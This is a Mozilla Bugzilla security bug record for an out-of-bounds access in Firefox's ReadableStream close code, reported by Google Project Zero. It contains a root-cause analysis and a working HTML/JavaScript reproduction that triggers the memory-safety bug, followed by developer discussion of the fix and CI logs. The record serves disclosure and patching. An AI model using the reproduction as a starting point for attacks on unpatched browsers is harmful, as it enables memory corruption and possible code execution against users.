Security: OOB access in js::ReadableStreamCloseInternal
Categories
(Core :: DOM: Networking, defect, P1)
Tracking
()
People
(Reporter: glazunov, Assigned: Waldo)
References
()
Details
(Keywords: sec-high, Whiteboard: [disclosure date is 2020-04-29][post-critsmash-triage][adv-main74+][adv-esr68.6+], [wptsync upstream])
Attachments
(8 files, 3 obsolete files)
11.69 KB,
text/plain
|
Details | |
873 bytes,
text/html
|
Details | |
47 bytes,
text/x-phabricator-request
|
tjr
:
approval-mozilla-beta+
tjr
:
sec-approval+
|
Details | Review |
47 bytes,
text/x-phabricator-request
|
Details | Review | |
962 bytes,
text/html
|
Details | |
47 bytes,
text/x-phabricator-request
|
Details | Review | |
2.38 KB,
patch
|
Details | Diff | Splinter Review | |
347 bytes,
text/plain
|
Details |
VULNERABILITY DETAILS
js/src/builtin/streams/ReadableStreamInternals.cpp:175:
MOZ_MUST_USE bool js::ReadableStreamCloseInternal(
JSContext* cx, Handle<ReadableStream*> unwrappedStream) {
// Step 1: Assert: stream.[[state]] is "readable".
MOZ_ASSERT(unwrappedStream->readable());
// Step 2: Set stream.[[state]] to "closed".
unwrappedStream->setClosed(); // *** 1 ***
// Step 4: If reader is undefined, return (reordered).
if (!unwrappedStream->hasReader()) {
return true;
}
// Step 3: Let reader be stream.[[reader]].
Rooted<ReadableStreamReader*> unwrappedReader(
cx, UnwrapReaderFromStream(cx, unwrappedStream));
if (!unwrappedReader) {
return false;
}
// Step 5: If ! IsReadableStreamDefaultReader(reader) is true,
if (unwrappedReader->is<ReadableStreamDefaultReader>()) {
ForAuthorCodeBool forAuthorCode = unwrappedReader->forAuthorCode();
// Step a: Repeat for each readRequest that is an element of
// reader.[[readRequests]],
Rooted<ListObject*> unwrappedReadRequests(cx, unwrappedReader->requests());
uint32_t len = unwrappedReadRequests->length(); // *** 2 ***
Rooted<JSObject*> readRequest(cx);
Rooted<JSObject*> resultObj(cx);
Rooted<Value> resultVal(cx);
for (uint32_t i = 0; i < len; i++) { // *** 3 ***
// Step i: Resolve readRequest.[[promise]] with
// ! ReadableStreamCreateReadResult(undefined, true,
// readRequest.[[forAuthorCode]]).
readRequest = &unwrappedReadRequests->getAs<JSObject>(i); // *** 4 ***
if (!cx->compartment()->wrap(cx, &readRequest)) {
return false;
}
resultObj = js::ReadableStreamCreateReadResult(cx, UndefinedHandleValue,
true, forAuthorCode);
if (!resultObj) {
return false;
}
resultVal = ObjectValue(*resultObj);
if (!ResolvePromise(cx, readRequest, resultVal)) { // *** 5 ***
return false;
}
}
// Step b: Set reader.[[readRequests]] to an empty List.
unwrappedReader->clearRequests();
}
// Step 6: Resolve reader.[[closedPromise]] with undefined.
if (!ResolveUnwrappedPromiseWithUndefined(cx,
unwrappedReader->closedPromise())) {
return false;
}
if (unwrappedStream->mode() == JS::ReadableStreamMode::ExternalSource) {
// Make sure we're in the stream's compartment.
AutoRealm ar(cx, unwrappedStream);
JS::ReadableStreamUnderlyingSource* source =
unwrappedStream->controller()->externalSource();
source->onClosed(cx, unwrappedStream); // *** 6 ***
}
return true;
}
js/src/builtin/streams/ReadableStreamOperations.cpp:187:
static bool TeeReaderReadHandler(JSContext* cx, unsigned argc, Value* vp) {
[...]
// Step 12.c.ix: If canceled1 is false, perform
// ? ReadableStreamDefaultControllerEnqueue(
// branch1.[[readableStreamController]], value1).
if (!unwrappedTeeState->canceled1()) { // *** 7 ***
unwrappedController = unwrappedTeeState->branch1();
if (!ReadableStreamDefaultControllerEnqueue(cx, unwrappedController,
value1)) {
return false;
}
}
[...]
}
The ECMAScript specification requires the promise resolution algorithm to synchronously access the
then
property of the resolution object. Therefore, when a user defines a corresponding accessor on
Object.prototype
, a majority of calls to ResolvePromise
become observable to user JavaScript
code.
ReadableStreamCloseInternal
fails to take that into account. The function doesn't check whether
the length of the request container[2] remains unchanged after a call to ResolvePromise
[5] and
uses the original length as the loop exit condition[3]. If an attacker shrinks the container from
inside the promise resolution, getAs
[4] will access out-of-bounds data during the next iteration.
The code sets the stream's state to closed
[1] before iterating through the requests, and most
methods that modify the container check that the stream is in the readable
state first. However,
the tee
algorithm employs its own set of flags to track the state of the child streams[7]. These
flags only get updated after the loop has ended[6], so TeeReaderReadHandler
will pass all the
checks even when it's called from inside ResolvePromise
.
The only remaining obstacle is that TeeReaderReadHandler
is attached to a promise reaction and is
supposed to always run asynchronously. Therefore, the attacker has to figure out how to
synchronously trigger promise reactions. Roughly speaking, reactions get executed when the last
active nsAutoMicroTask
object is destroyed. The main challenge here is to run JavaScript outside
the nsAutoMicroTask
scope. Conventional means of running JS like event handlers, setTimeout
and
<script> elements won't work as they always instantiate a new nsAutoMicroTask
. Instead, the
attacker can reuse the then
accessor technique and execute JavaScript, for example, during
resolution of a promise created by the Fetch API. The stack trace in this case looks as follows:
CallGetter
GetExistingProperty
NativeGetPropertyInline
js::NativeGetProperty
js::GetProperty
js::GetProperty
js::GetProperty
ResolvePromiseInternal
js::PromiseObject::resolve
ResolveOrRejectPromise
js::ReadableStreamFulfillReadOrReadIntoRequest
JS::ReadableStreamUpdateDataAvailableFromSource
mozilla::dom::BodyStream::OnInputStreamReady
nsInputStreamReadyEvent::Run
All that's left then is to create and immediately destroy an nsAutoMicroTask
object at the right
time, which is trivial.
VERSION
Firefox 72.0.2
Firefox 74.0a1 (changeset fc5cbea8d173)
REPRODUCTION CASE
<body>
<script>
performMicrotaskCheckpoint = () => {
document.createNodeIterator(document, -1, {
acceptNode() {
return NodeFilter.FILTER_ACCEPT;
} }).nextNode();
}
runOutsideMicrotasksScope = func => {
fetch(location).then(response => {
stream = response.body;
Object.prototype.__defineGetter__('then', () => {
delete Object.prototype.then;
func();
});
reader = stream.getReader();
reader.read();
});
}
runOutsideMicrotasksScope(() => {
let stream = new ReadableStream({ start(ctr) { controller = ctr } });
let tee_streams = stream.tee();
let reader = tee_streams[0].getReader();
reader.read();
reader.read();
Object.prototype.__defineGetter__('then', () => {
delete Object.prototype.then;
controller.enqueue('foo');
performMicrotaskCheckpoint();
});
reader.cancel();
});
</script>
</body>
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero
This bug is subject to a 90 day disclosure deadline. After 90 days elapse, the bug report will
become visible to the public. The scheduled disclosure date is 2020-04-29. Disclosure at an earlier
date is also possible if agreed upon by all parties.
Reporter | ||
Comment 1•5 years ago
|
||
Updated•5 years ago
|
Assignee | ||
Comment 2•5 years ago
|
||
I can approximately comprehend many of the words in comment 0, but my understanding of microtasks and exactly how they are specified to work is...not good enough to understand the details roughly once nsAutoMicroTask
gets mentioned. I may need to drag in a DOM expert or so to make progress through this, and to figure out what the right way to address it is, exactly.
Assignee | ||
Comment 3•5 years ago
|
||
CCing suspects for investigation, since I barely understand the JS half of this and I emphatically do not understand the DOM or nsAutoMicroTask
portion of this; will try to poke people to see if we can walk through this in-person in Berlin today, too.
Assignee | ||
Comment 4•5 years ago
|
||
So I managed to find Olli at lunch...then as I was eating nearby he disappeared and I lost track of him. Let's go to needinfo, at least til I can find him in person. I have an hour and a half til the next place I have to be, if something possibly can be fit in in that time...
I briefly described/discussed this with annevk as well a few minutes ago, and he was wondering if we were just flat-out missing an nsAutoMicroTask
somewhere -- because it ought not be possible for the ResolvePromise
to induce a synchronous resolution that way. This seems at least possible to me, based on my meager knowledge of promises and the DOM side of them, but I definitely don't have the knowledge to evaluate the claim and have any confidence in my evaluation.
Assignee | ||
Comment 5•5 years ago
|
||
So looking at this over IRL, we think there's definitely a missing nsAutoMicroTask
in mozilla::dom::BodyStream::OnInputStreamReady
or so -- a microtask missed because it wasn't recognized that the JSAPI function called there could cause script to run. :-|
Once that's set aside, tho, it seems like it ought be fragile to loop over indexes in the read requests array this way. But, it really shouldn't be -- that array shouldn't be being touched by any code other than this, when the stream is already marked as closed. It feels to me like we should 1) change the relevant steps of ReadableStreamCloseInternal
so that we extract the requests array (implicitly clearing the stored array) before we process it (now as sole owner of it), which requires 2) figuring out who else is "simultaneously" accessing-and-mutating that array and making them stop. It looks like the simultaneous access is supposed to only be possible with a spec bug -- maybe? -- but I'm building a browser now to see if I'm misreading things (very possible). Once we do that, tho, there would not be a possibility of multiple places in code modifying this array at the same time, and it would then be safe and normal to loop element-by-element as we do now.
Comment 6•5 years ago
|
||
IRL I wondered if just replacing then() with something which modifies the stream internals is enough to trigger this.
Assignee | ||
Comment 7•5 years ago
|
||
Running the testcase in a debug build will fail the assertion at the end of this snippet:
MOZ_MUST_USE bool js::ReadableStreamDefaultControllerEnqueue(
JSContext* cx, Handle<ReadableStreamDefaultController*> unwrappedController,
Handle<Value> chunk) {
AssertSameCompartment(cx, chunk);
// Step 1: Let stream be controller.[[controlledReadableStream]].
Rooted<ReadableStream*> unwrappedStream(cx, unwrappedController->stream());
// Step 2: Assert:
// ! ReadableStreamDefaultControllerCanCloseOrEnqueue(controller) is
// true.
MOZ_ASSERT(!unwrappedController->closeRequested());
MOZ_ASSERT(unwrappedStream->readable());
The ReadableStream tee code can call this function, on a controller for a stream that does not satisfy step 2 -- which associated spec prose indicates is a precondition. So possibly the ReadableStream tee code should be checking not just !canceled1
, but also can-close-or-enqueue, before doing its thing. (This appears to be the only place that can touch this array -- so if we fix this, we can extract out the array and operate on it as a local, as suggested in comment 5.)
Comment 8•5 years ago
|
||
OK, so a few things:
-
Given that ReadableStreamUpdateDataAvailableFromSource can run script,
BodyStream::OnInputStreamReady
should absolutely have anAutoEntryScript
, not anAutoJSAPI
. -
AutoEntryScript
is spec-visible, in the sense that it can trigger promise reactions when it comes off the stack. Specs should generally have corresponding bits involving manipulating the script context stack and doing microtask checkpoints (e.g. see "prepare to run a script" or "prepare to run a callback" in the HTML spec, and their corresponding cleanup algorithms). Sounds like the streams spec needs to do something like that, if it's introducing script entry points....
Updated•5 years ago
|
Assignee | ||
Comment 9•5 years ago
|
||
So, missing AutoEntryScript
is apparently really terrible. Could we at least make it not security-terrible, by making JS::ResolvePromise
or whatever the underlying-est primitive is, check that we're always inside some sort of whatever-it-is-AutoEntryScript
enacts (and probably crash if we aren't)? Doesn't solve the missing-an-entry problem and identifying all such places, but at least it means missing something isn't bad.
Assignee | ||
Comment 10•5 years ago
|
||
Updated•5 years ago
|
Assignee | ||
Comment 11•5 years ago
|
||
So I may be doing something terribly wrong somehow, but if I write that patch without the explicit nsAutoMicroTask mt;
, AutoEntryScript
does not actually seem to defer microtask resolution, and the assertion/crash are still possible. For comparison, script execution has in sequence an nsAutoMicroTask mt;
followed by an AutoEntryScript
:
https://searchfox.org/mozilla-central/source/dom/script/ScriptLoader.cpp#2710
If I really shouldn't need the nsAutoMicroTask mt;
there, it seems like something else would need changing for that. Right?
(I'm approximately science-dogging away here, so if it looks like I have no idea what I'm doing there's a good reason for that...)
Assignee | ||
Comment 12•5 years ago
|
||
Another possibility, besides (in addition to?) crashing in resolve/reject-promise internals if there's no microtask queue pending, would be to check/assert/crash in nsAutoMicroTask
if there are any pending promise jobs to reject/resolve when the constructor call happens (and the constructor call isn't a nested nsAutoMicroTask
).
Updated•5 years ago
|
Updated•5 years ago
|
Comment 13•5 years ago
|
||
[Tracking Requested - why for this release]: sec-high with 2020-04-29 disclosure date. I'm not sure exactly what releases we want to track for this.
Updated•5 years ago
|
Comment 14•5 years ago
|
||
So, missing AutoEntryScript is apparently really terrible.
Apparently.... I wonder whether we could do an nsAutoMicrotask in AutoJSAPI without causing visible spec violations.
by making JS::ResolvePromise or whatever the underlying-est primitive is, check that we're always inside some sort of
whatever-it-is-AutoEntryScript enacts (and probably crash if we aren't)?
The underlying-est primitives are whatever can run script.
We have basically two options, not necessarily mutually exclusive. One is to do check-and-crash at the actual script entry points. So for example in js::InternalCallOrConstruct
or some such, if we push things down as much as we can to make sure we're definitely catching all the cases that would definitely enter script. This has the benefit of good coverage of the really-dangerous cases and the drawback of bad coverage of callsites that only sometimes call script (e.g. the "then" getter involved in this case!). The second option is to put these checks at higher-level entrypoints. ResolvePromise
is a bit too high-level; it makes more sense to put it in GetProperty
somewhere, since ResolvePromise
always calls GetProperty
, right?
As far as what the check should be checking... there isn't anything specific right now to check, unfortunately. We could add something, but doing it fast would be an issue, unless we stored it on the JSContext itself or something like that.
Bobby may have some thoughts too; I thought he'd planned on this sort of enforcement initially with AutoEntryScript.
AutoEntryScript does not actually seem to defer microtask resolution
Ugh. I was sure that AutoEntryScript
had an AutoMicroTask
inside, but apparently not? Looks like CallSetup
does separate microtask management as well.
I think that's pretty unexpected and we should definitely have an AutoMicroTask as part of AutoEntryScript, though some consumers that want to defer the microtask checkpoint until later than ~AutoEntryScript might need a separate AutoMicroTask anyway.
Comment 15•5 years ago
|
||
I think that's pretty unexpected and we should definitely have an
AutoMicroTask
as part ofAutoEntryScript
We'd need to audit consumers, sadly, to make sure we don't coalesce microtasks across too much stuff. For example, CustomElementReactionsStack::InvokeReactions
will sometimes have an AES live across all the reactions (!), which would probably give the wrong microtask semantics...
The good news is we only have about 50 uses of AutoEntryScript. The bad news is that I expect most are broken wrt microtasks; we should be able to write tests for this...
Comment 16•5 years ago
|
||
So bug 1181740 was sort of about removing the cases when we have "nsAutoMicroTask but not AES". The discussion above is removing cases when we have "AES but not nsAutoMicroTask"...
Assignee | ||
Comment 17•5 years ago
|
||
(In reply to Boris Zbarsky [:bzbarsky, bz on IRC] from comment #14)
The underlying-est primitives are whatever can run script.
We have basically two options, not necessarily mutually exclusive. One is to do check-and-crash at the actual script entry points. So for example in
js::InternalCallOrConstruct
or some such, if we push things down as much as we can to make sure we're definitely catching all the cases that would definitely enter script. This has the benefit of good coverage of the really-dangerous cases and the drawback of bad coverage of callsites that only sometimes call script (e.g. the "then" getter involved in this case!). The second option is to put these checks at higher-level entrypoints.ResolvePromise
is a bit too high-level; it makes more sense to put it inGetProperty
somewhere, sinceResolvePromise
always callsGetProperty
, right?As far as what the check should be checking... there isn't anything specific right now to check, unfortunately. We could add something, but doing it fast would be an issue, unless we stored it on the JSContext itself or something like that.
I'm sure I don't understand the constraints enough, but at least within this bug's tunnel-vision I am worrying solely about promise resolution happening unexpectedly early. And so ResolvePromise
(or maybe ResolvePromiseInternal
) is the underlying-est primitive to target that particular gang-aft-agley scenario. And promise resolving/rejecting is a drawn-out slow process that could tolerate one more check.
If things go awry for other stuff like GetProperty
or any function call at all, those are probably not code paths that could support a check of this every time they happen...I would think. We'd need better can-run-script attributing or something else for that.
Comment 18•5 years ago
|
||
but at least within this bug's tunnel-vision I am worrying solely about promise resolution happening unexpectedly early
Ah. I was worried about script running without an AES on the stack, which is also a bad thing that we need to prevent.
Comment 19•5 years ago
|
||
(In reply to Boris Zbarsky [:bzbarsky, bz on IRC] from comment #14)
Bobby may have some thoughts too; I thought he'd planned on this sort of enforcement initially with AutoEntryScript.
We have bug 1108262 on file for that, at least. I think we discussed this a few times over the years, but never acted on it. Would certainly be worth making this whole situation less foot-gun-y.
Ugh. I was sure that
AutoEntryScript
had anAutoMicroTask
inside, but apparently not?
I originally wanted to do this, but IIRC you and/or smaug insisted that the spec required otherwise. I have a few IRC logs from that era I could dig up if that's helpful.
Comment 20•5 years ago
|
||
but IIRC you and/or smaug insisted that the spec required otherwise
I don't think it would have been me, because I am pretty sure I did not pretend to understand microtasks back then.
The really big question is whether all the places where we have AutoEntryScript correspond to the spec pushing things on the JavaScript context stack... Really whether they correspond to https://html.spec.whatwg.org/#prepare-to-run-script and https://html.spec.whatwg.org/#clean-up-after-running-script -- the former basically does a thing that means "no microtasks will run" and the latter will run microtasks if it's the outermost script execution.
Assignee | ||
Comment 21•5 years ago
|
||
Depends on D61478
Assignee | ||
Comment 22•5 years ago
|
||
(I got guilted into writing the automated test I should have written and posted already, by the security-approval/branch-landing form. Sue me. :-) Who knows when we can land it...but at least it's there to land when the time comes.)
Assignee | ||
Comment 23•5 years ago
|
||
So in the course of writing minimal testcases (before wrangling them into wpt shape), I happened to write this testcase. Obviously it fails without this patch...but it fails this assertion
// The WriteInto callback changes mState to eChecking.
MOZ_ASSERT_IF(ok, mState == eChecking);
immediately after JS::ReadableStreamUpdateDataAvailableFromSource
finishes.
Moreover, it fails that assertion even with this patch in place.
This probably is just because alert
means nested event queues or other insanity along those lines, but I don't know. The assert here is in BodyStream.cpp
, so it could be a problem with BodyStream.cpp
. Maybe this assertion assumes the invisibility/un-alterability of the update-data-available action, that is belied by this stupid "then"
interposition mandated by promises?
Is there an additional problem here, worth a separate bug, that is not just "alert
is known to be terrible"? And if there is one, how ought I go about filing a bug on it in a way that doesn't inadvertently reveal the existence of this bug?
Assignee | ||
Updated•5 years ago
|
Comment 24•5 years ago
|
||
Updated•5 years ago
|
Comment 25•5 years ago
|
||
Comment 26•5 years ago
|
||
Waldo, do you mind to ask for a security-approval and land my patch with yours? Thanks.
Updated•5 years ago
|
Updated•5 years ago
|
Updated•5 years ago
|
Assignee | ||
Comment 27•5 years ago
|
||
Will do.
Given this is security and all, I'm a bit paranoid about just adding explanatory comments, so I moved the removal of the assertion into my patch, commandeered your revision (hopefully without changing author, or at least the revision I submitted with moz-phab
had you set as author) and made it add the comment, then submitted those with the test on top of them.
I'm still floundering my way through the spec idioms some, so I'm going to go for approvals and not hold that up for whatever spec changes may be needed here.
Assignee | ||
Comment 28•5 years ago
|
||
Comment on attachment 9124087 [details]
Bug 1612308. r=bzbarsky
Security Approval Request
- How easily could an exploit be constructed based on the patch?: Someone who understands the precise ramifications of a missing microtask queue setup probably can attack the absence of this patch pretty easily.
If they're doing the trick that was done here -- abuse streams code that presumes promises are never fulfilled synchronously -- the failure mode is accessing off the end of (what can be made to be) a heap allocation, then interpreting that data as a JSObject*
, then using it as if it were valid. It's probably not entirely easy, but if you have that much rope I expect a capable attacker probably can get to arbitrary code execution.
If they're doing some other trick, that abuses the absence of an AutoEntryScript
, I do not understand the ramifications of this enough to say what the bad things that can happen are. Except that apparently they are Bad.
- Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
- Which older supported branches are affected by this flaw?: Goes back to at least esr68, so of them
- If not all supported branches, which bug introduced the flaw?: None
- Do you have backports for the affected branches?: No
- If not, how different, hard to create, and risky will they be?: The patch applies cleanly to beta.
ESR68 has this code in dom/fetch/FetchStream.cpp
, but it's pretty easy to make the necessary changes. I've made them locally, will post that patch in a sec.
- How likely is this patch to cause regressions; how much testing does it need?: It's a pretty straightforward patch, unlikely to cause regressions. Definitely on the safer side, but probably not entirely absolutely safe.
Assignee | ||
Comment 29•5 years ago
|
||
[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: Probably high/critical.
User impact if declined: Bad Stuff, see previous comment.
Fix Landed on Version: Hopefully landing this version?
Risk to taking this patch (and alternatives if risky): Ain't got no choice.
Comment 30•5 years ago
|
||
(In reply to Bobby Holley (:bholley) from comment #19)
I originally wanted to do this, but IIRC you and/or smaug insisted that the spec required otherwise. I have a few IRC logs from that era I could dig up if that's helpful.
It would have caused us trigger microtask checkpoint when entering chrome JS.
Assignee | ||
Comment 31•5 years ago
|
||
Comment on attachment 9124087 [details]
Bug 1612308. r=bzbarsky
Beta/Release Uplift Approval Request
- User impact if declined: See previous comments.
- Is this code covered by automated tests?: No
- Has the fix been verified in Nightly?: No
- Needs manual test from QE?: No
- If yes, steps to reproduce:
- List of other uplifts needed: None
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Pretty straightforward to add script entrypoint/microtask handling here, changes are pretty understandable. The changes have a variety of interesting implications that are not drop-dead simple, so if I had the option I'd probably rate it somewhere between low and medium. But I don't, and the change couldn't be any smaller, and
AutoEntryScript
andnsAutoMicroTask
are both widely used so are generously exercised, so it seems to shade a bit closer to low than to medium. - String changes made/needed:
Comment 32•5 years ago
|
||
It would have caused us trigger microtask checkpoint when entering chrome JS.
Only when there's no content JS on the stack already, right? I guess that could still be an issue if there are places which effectively post a microtask while not in the scope of an nsAutoMicrotask, whether in our impl or in the spec?
Comment 33•5 years ago
|
||
Comment on attachment 9124087 [details]
Bug 1612308. r=bzbarsky
Approved to land
Updated•5 years ago
|
Comment 34•5 years ago
|
||
This landed: https://hg.mozilla.org/integration/autoland/rev/602a074ca5a5
and was backed out: https://hg.mozilla.org/integration/autoland/rev/d3d79d459043
Comment 35•5 years ago
|
||
Push with failure: https://treeherder.mozilla.org/#/jobs?repo=autoland&resultStatus=testfailed%2Cbusted%2Cexception&revision=602a074ca5a5b301cadad4e2005ff33008b3927f
Failure log: https://treeherder.mozilla.org/logviewer.html#?job_id=290480240&repo=autoland
[task 2020-02-26T02:34:16.210Z] 02:34:16 INFO - TEST-START | /fetch/api/basic/stream-response.any.html
[task 2020-02-26T02:34:16.210Z] 02:34:16 INFO - Closing window 199
[task 2020-02-26T02:35:11.208Z] 02:35:11 INFO - Got timeout in harness
[task 2020-02-26T02:35:11.551Z] 02:35:11 INFO - TEST-UNEXPECTED-TIMEOUT | /fetch/api/basic/stream-response.any.html | TestRunner hit external timeout (this may indicate a hang)
[task 2020-02-26T02:35:11.551Z] 02:35:11 INFO - TEST-INFO took 55343ms
[task 2020-02-26T02:35:12.781Z] 02:35:12 INFO - Browser not responding, setting status to CRASH
[task 2020-02-26T02:35:12.781Z] 02:35:12 WARNING - Command left in command_queue during cleanup: 'test_ended', (<wptrunner.wpttest.TestharnessTest /fetch/api/basic/stream-response.any.html>, (<wptrunner.wpttest.TestharnessResult CRASH>, []))
[task 2020-02-26T02:35:12.782Z] 02:35:12 INFO - Closing logging queue
[task 2020-02-26T02:35:12.782Z] 02:35:12 INFO - queue closed
[task 2020-02-26T02:35:12.797Z] 02:35:12 INFO - Setting up ssl
[task 2020-02-26T02:35:12.914Z] 02:35:12 INFO - certutil |
[task 2020-02-26T02:35:12.989Z] 02:35:12 INFO - certutil |
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - certutil |
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - Certificate Nickname Trust Attributes
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - SSL,S/MIME,JAR/XPI
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO -
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO - web-platform-tests CT,,
[task 2020-02-26T02:35:13.010Z] 02:35:13 INFO -
[task 2020-02-26T02:35:15.883Z] 02:35:15 INFO - adb Granting important runtime permissions to org.mozilla.geckoview.test
[task 2020-02-26T02:35:17.680Z] 02:35:17 INFO - adb launch_application: am start -W -n org.mozilla.geckoview.test/org.mozilla.geckoview.test.TestRunnerActivity -a android.intent.action.MAIN --es env9 MOZ_DISABLE_NONLOCAL_CONNECTIONS=1 --es env8 R_LOG_DESTINATION=stderr --es args "-no-remote -profile /sdcard/tests/profile --marionette about:blank" --es env3 MOZ_HIDE_RESULTS_TABLE=1 --es env2 R_LOG_VERBOSE=1 --es env1 MOZ_WEBRENDER=0 --es env0 MOZ_CRASHREPORTER=1 --es env7 MOZ_CRASHREPORTER_SHUTDOWN=1 --es env6 MOZ_IN_AUTOMATION=1 --es env5 MOZ_LOG=signaling:3,mtransport:4,DataChannel:4,jsep:4 --es env4 STYLO_THREADS=1 --ez use_multiprocess True --es env12 R_LOG_LEVEL=6 --es env11 MOZ_PROCESS_LOG=/tmp/tmpbyLhkVpidlog --es env10 MOZ_CRASHREPORTER_NO_REPORT=1
[task 2020-02-26T02:35:19.560Z] 02:35:19 INFO - Starting runner
[task 2020-02-26T02:35:19.746Z] 02:35:19 INFO - TEST-START | /fetch/api/basic/stream-response.any.worker.html
[task 2020-02-26T02:35:19.783Z] 02:35:19 INFO - Setting pref javascript.options.streams (true)
[task 2020-02-26T02:36:00.000Z] 02:36:00 INFO -
[task 2020-02-26T02:36:00.000Z] 02:36:00 INFO - TEST-UNEXPECTED-TIMEOUT | /fetch/api/basic/stream-response.any.worker.html | Stream response's body - Test timed out
[task 2020-02-26T02:36:00.350Z] 02:36:00 INFO - TEST-UNEXPECTED-TIMEOUT | /fetch/api/basic/stream-response.any.worker.html | expected OK
Assignee | ||
Comment 36•5 years ago
|
||
...okay, need to look harder at this:
1:53.08 TEST_START: /fetch/api/basic/stream-response.any.html
1:54.15 INFO Setting pref javascript.options.streams (true)
1:56.31 pid:4209 [rr 4668 264454][Child 4668, Main Thread] WARNING: NS_ENSURE_TRUE(mPresShell) failed: file /home/jwalden/moz/after/layout/base/nsPresContext.cpp, line 847
2:03.47 pid:4209 [rr 4541 286315][Child 4541, Main Thread] WARNING: Trying to request nsIHttpChannel from DocumentChannel, this is likely broken: file /home/jwalden/moz/after/netwerk/ipc/DocumentChannel.cpp, line 64
2:07.86 pid:4209 [rr 4668 299262][Child 4668, Main Thread] WARNING: Trying to request nsIHttpChannel from DocumentChannel, this is likely broken: file /home/jwalden/moz/after/netwerk/ipc/DocumentChannel.cpp, line 64
2:13.10 pid:4209 [rr 4668 315356]###!!! ERROR: Potential deadlock detected:
2:13.10 pid:4209 [rr 4668 315359]=== Cyclical dependency starts at
2:13.10 pid:4209 [rr 4668 315361]--- Mutex : BodyStream::mMutex[rr 4668 315363] (currently acquired)
2:13.10 pid:4209 [rr 4668 315365] calling context
2:13.10 pid:4209 [rr 4668 315367] [stack trace unavailable]
2:13.10 pid:4209 [rr 4668 315369]
2:13.10 pid:4209 === Cycle completed at
2:13.10 pid:4209 [rr 4668 315371]--- Mutex : BodyStream::mMutex[rr 4668 315373] (currently acquired)
2:13.10 pid:4209 [rr 4668 315375] calling context
2:13.10 pid:4209 [rr 4668 315377] [stack trace unavailable]
2:13.10 pid:4209 [rr 4668 315379]
2:13.10 pid:4209 ###!!! Deadlock may happen NOW!
2:13.10 pid:4209 [rr 4668 315383][rr 4668 315385][Child 4668, Main Thread] ###!!! ASSERTION: Potential deadlock detected:
2:13.10 pid:4209 Cyclical dependency starts at
2:13.10 pid:4209 Mutex : BodyStream::mMutex (currently acquired)
2:13.10 pid:4209 Cycle completed at
2:13.10 pid:4209 Mutex : BodyStream::mMutex (currently acquired)
2:13.11 pid:4209 ###!!! Deadlock may happen NOW!
2:13.11 pid:4209 : 'Error', file /home/jwalden/moz/after/xpcom/threads/BlockingResourceBase.cpp, line 248
2:13.11 pid:4209 [rr 4668 315387]mozilla::detail::MutexImpl::mutexLock: pthread_mutex_lock failed: Resource deadlock avoided
2:13.11 pid:4209 [rr 4668 315389]Hit MOZ_CRASH(mozilla::detail::MutexImpl::mutexLock: pthread_mutex_lock failed) at /home/jwalden/moz/after/mozglue/misc/Mutex_posix.cpp:127
2:13.11 pid:4209 [rr 4668 315399]UndefinedBehaviorSanitizer[rr 4668 315401]:DEADLYSIGNAL
2:13.11 pid:4209 [rr 4668 315405][rr 4668 315409]==4668==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000001 (pc 0x55c660de1736 bp 0x7ffccb421060 sp 0x7ffccb421050 T4668)
2:13.11 pid:4209 [rr 4668 315412][rr 4668 315415]==4668==The signal is caused by a WRITE memory access.
2:13.11 pid:4209 [rr 4668 315419]==4668==Hint: address points to the zero page.
Evidently just AES/nsAutoMicroTask-ing is mutex-unhappymaking. How to fix, how to fix...
Assignee | ||
Comment 37•5 years ago
|
||
https://treeherder.mozilla.org/#/jobs?repo=try&revision=94d29ab1716fbb117144016b4ca1daa771965312 potentially is a solution. (Already landed and was backed out once, cat's out of the bag more or less, time to go to try...)
Assignee | ||
Comment 38•5 years ago
|
||
Well that was dumb, can't use MutexAutoUnlock
which is RAII to affect a previously-declared thing that is also RAII. Time for some wonderfully terrible Maybe<MutexAutoLock>
. 😬 Try churns away...again.
https://treeherder.mozilla.org/#/jobs?repo=try&revision=2f8884dd54934c29186a38fd43f47df907b4733c
Comment 39•5 years ago
|
||
https://hg.mozilla.org/integration/autoland/rev/d3b95145566b4cc07e7b11539d0c88ad6de5d7d4
https://hg.mozilla.org/mozilla-central/rev/d3b95145566b
Comment 40•5 years ago
|
||
uplift |
Comment 41•5 years ago
|
||
Backout from esr68: https://hg.mozilla.org/releases/mozilla-esr68/rev/cdbfbe5cb0208c97d68a415dfa3a6f788b05d807
Has the wpt failures for which it got backed out from central: https://treeherder.mozilla.org/#/jobs?repo=mozilla-esr68&selectedJob=291113127&revision=6f6b962a1feef908c55f2ddc3307833d9f5337a5
Assignee | ||
Comment 42•5 years ago
|
||
I probably should have clarified -- not just as a comment on the trunk-targeted phabricator rev -- that the esr68 patch has not been updated with the amendments to the trunk patch. (This system where we have two separate places to record progress, here and phabricator, is such garbage. :-( )
Assignee | ||
Comment 43•5 years ago
|
||
Updated•5 years ago
|
Assignee | ||
Comment 44•5 years ago
|
||
Comment 45•5 years ago
|
||
uplift |
Updated•5 years ago
|
Assignee | ||
Comment 46•5 years ago
|
||
Beefed up the comment-adding patch with comments relating to why Maybe<MutexAutoLock>
is desirable/necessary. Still need to get to making any spec changes to do microtask handling/etc. properly.
Updated•5 years ago
|
Comment 47•5 years ago
|
||
Okay this one was pretty tough to write an advisory for. Suggestions welcome.
Comment 48•5 years ago
|
||
Updated•5 years ago
|
Assignee | ||
Comment 49•5 years ago
|
||
Well this is interesting. It appears this problem affected more browser engines than just us:
https://github.com/whatwg/streams/pull/1029
That looks like the hackaround workaround I initially thought was needed here, but really the problem was with our DOM code not deferring the processing. I'll keep poking there and see if we can't get the root cause fixed in whatever the relevant spec is.
Assignee | ||
Updated•5 years ago
|
Updated•5 years ago
|
Updated•5 years ago
|
Comment 50•4 years ago
|
||
Comment 52•4 years ago
|
||
bugherder |
Updated•4 years ago
|
Description
•